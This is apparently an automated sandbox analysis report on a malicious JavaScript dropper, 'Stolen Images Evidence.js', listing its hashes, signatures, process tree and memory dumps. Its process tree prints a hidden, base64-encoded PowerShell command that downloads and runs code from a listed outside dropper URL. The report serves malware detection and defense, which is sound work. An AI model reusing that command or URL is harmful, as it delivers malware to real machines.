Analysis
- Max time kernel: 13s
- Max time network: 67s
- Platform: windows10_x64
- Resource: win10v20210408
- Submitted: 27-07-2021 19:27
Static task: static1
Behavioral task: behavioral1
- Sample: Stolen Images Evidence.js
- Resource: win7v20210410 (windows7_x64)
- 0 signatures, 0 seconds
Behavioral task: behavioral2
- Sample: Stolen Images Evidence.js
- Resource: win10v20210408 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: Stolen Images Evidence.js
- Size: 23KB
- MD5: 86c4c4a86388ab87b8166563fc6080b9
- SHA1: a22941692d34245363e1ed75a2e55f9e439f3e2d
- SHA256: 6961814b2c02d34f6eb8da26d59c3e555763f28680ed67bd7c6b30994dba74d3
- SHA512: 9005d46de018ce0409a2a8f0bd7afe611636c88e5f503b4d0e22ef72dbec7b0240a3f1c12b6711a07dc839d04225df5f3fcee4db8c68edf4eb8a58a7aef71ebc
- Score: 10/10
Malware Config
- Extracted: language ps1, deobfuscated
- URLs (ps1.dropper): http://munardis.space/222g100/index.php
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes: flow 8, pid 3948, powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (1 IoC)
  Processes: pid 2840 WerFault.exe, target pid 3948 powershell.exe
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes: pid 3948 powershell.exe (3 events); pid 2840 WerFault.exe (15 events)
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes: Token: SeDebugPrivilege, pid 3948 powershell.exe; Token: SeDebugPrivilege, pid 2840 WerFault.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: PID 652 wscript.exe wrote to memory of 2360 cmd.exe (2 events); PID 2360 cmd.exe wrote to memory of 3948 powershell.exe (2 events)
Processes
1. C:\Windows\system32\wscript.exe
   wscript.exe "C:\Users\Admin\AppData\Local\Temp\Stolen Images Evidence.js"
   - Suspicious use of WriteProcessMemory
2. C:\Windows\System32\cmd.exe (child of 1)
   "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
   - Suspicious use of WriteProcessMemory
3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of 2)
   poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQB1AG4AYQByAGQAaQBzAC4AcwBwAGEAYwBlAC8AMgAyADIAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
   - Blocklisted process makes network request
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
4. C:\Windows\system32\WerFault.exe (child of 3)
   C:\Windows\system32\WerFault.exe -u -p 3948 -s 2296
   - Program crash
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- memory/2360-114-0x0000000000000000-mapping.dmp
- memory/3948-115-0x0000000000000000-mapping.dmp
- memory/3948-121-0x000002791BB70000-0x000002791BB71000-memory.dmp (filesize 4KB)
- memory/3948-124-0x0000027919B60000-0x0000027919B62000-memory.dmp (filesize 8KB)
- memory/3948-125-0x0000027919B63000-0x0000027919B65000-memory.dmp (filesize 8KB)
- memory/3948-130-0x000002791BD20000-0x000002791BD21000-memory.dmp (filesize 4KB)
- memory/3948-135-0x0000027919B66000-0x0000027919B68000-memory.dmp (filesize 8KB)